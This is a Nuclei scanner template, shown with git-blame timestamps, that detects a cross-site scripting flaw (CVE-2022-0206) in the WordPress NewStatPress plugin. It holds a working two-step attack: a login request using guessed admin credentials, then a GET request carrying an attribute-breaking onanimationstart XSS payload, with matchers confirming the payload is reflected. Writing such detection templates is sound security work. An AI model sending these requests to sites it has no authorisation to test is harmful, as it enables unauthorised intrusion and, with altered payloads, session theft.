nuclei-templates/http/cves/2022/CVE-2022-0206.yaml

53 lines
2.1 KiB
YAML
Raw Normal View History

2023-03-18 22:07:09 +00:00
id: CVE-2022-0206
info:
name: WordPress NewStatPress <1.3.6 - Cross-Site Scripting
2023-03-18 22:07:09 +00:00
author: r3Y3r53
severity: medium
description: |
WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 1.3.6.
2023-03-18 22:07:09 +00:00
reference:
- https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9
- https://wordpress.org/plugins/newstatpress
- https://nvd.nist.gov/vuln/detail/CVE-2022-0206
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-03-18 22:07:09 +00:00
cve-id: CVE-2022-0206
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.00106
epss-percentile: 0.42988
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
2023-03-18 22:07:09 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: newstatpress_project
product: newstatpress
2023-09-06 11:59:08 +00:00
framework: wordpress
tags: xss,wp,authenticated,cve2022,wordpress,wp-plugin,newstatpress,wpscan,cve
2023-03-18 22:07:09 +00:00
http:
2023-03-18 22:07:09 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log=admin&pwd=admin123&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
2023-03-18 22:07:09 +00:00
- 'contains(body_2, "onanimationstart=alert(document.domain)")'
- 'contains(body_2, "newstatpress_page")'
condition: and
# digest: 4b0a0048304602210094ae9464568bd47ae2307d385f86dafcd191424a5f8e5d73500429d97fe5ba1c022100e2b97b16daf1d53447349ec0e13660eefa861bf15cf5ddda5dac8ba410384936:922c64590222798bb761d5b6d8e72950